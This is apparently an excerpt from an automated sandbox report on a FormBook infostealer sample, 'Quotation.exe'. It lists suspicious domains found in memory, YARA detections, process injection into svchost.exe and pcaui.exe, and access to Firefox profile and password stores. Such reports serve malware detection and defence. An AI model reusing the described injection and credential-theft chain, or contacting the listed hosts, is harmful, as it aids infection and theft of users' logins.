79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: iEbayRsPzr.exe, 00000005.00000002.4155924526.0000000005912000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3kw40881107247y.click
            Source: iEbayRsPzr.exe, 00000005.00000002.4155924526.0000000005912000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3kw40881107247y.click/6wln/
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Matteicapital.online
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.00000000064CA000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000049BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/cvhb/?GzeXFT7=eb9ahS5GFYDOhq0WWSJwR0pgVyjGk3ZRXDTXF/EDnGWOAiF9jJHx
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Angel_Investors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Funds.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwvd
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Home_Equity_Rates.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online
            Source: pcaui.exe, 00000003.00000002.4156641724.0000000007750000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns
            Source: pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: pcaui.exe, 00000003.00000002.4154775790.0000000005CF0000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: iEbayRsPzr.exe, 00000005.00000002.4154120992.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: pcaui.exe, 00000003.00000003.2002577506.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4153023182.0000000000AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: pcaui.exe, 00000003.00000003.2002577506.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4153023182.0000000000AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: pcaui.exe, 00000003.00000002.4153023182.0000000000AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: pcaui.exe, 00000003.00000003.2002577506.0000000000B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: pcaui.exe, 00000003.00000002.4153023182.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: pcaui.exe, 00000003.00000003.2002577506.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4153023182.0000000000AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: pcaui.exe, 00000003.00000002.4153023182.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: pcaui.exe, 00000003.00000003.2001446480.0000000007A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: pcaui.exe, 00000003.00000002.4154775790.0000000005B5E000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.000000000404E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
            Source: pcaui.exe, 00000003.00000002.4156818268.0000000007A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: pcaui.exe, 00000003.00000002.4154775790.00000000056A8000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.1807163533.0000000002350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4153859455.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4154038059.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4155924526.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1807834480.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4152729968.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1807419459.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4153920591.0000000002D80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Binary is likely a compiled AutoIt script file
            Source: Quotation.exe, 00000000.00000000.1686995071.00000000007DE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4842b820-5
            Source: Quotation.exe, 00000000.00000000.1686995071.00000000007DE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: vSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6554738e-6
            Source: Quotation.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f2bfe736-2
            Source: Quotation.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_da35a857-a
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Quotation.exe
            Source: Quotation.exe, 00000000.00000003.1712041457.0000000003C0D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
            Source: Quotation.exe, 00000000.00000003.1703522488.0000000003A63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
            Source: Quotation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/15
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\autD8D5.tmpJump to behavior
            Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: pcaui.exe, 00000003.00000002.4153023182.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.2002711667.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.2002479623.0000000000B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Quotation.exeReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
            Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: pcaui.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dui70.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wer.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exeSection loaded: rasadhlp.dllJump to behavior
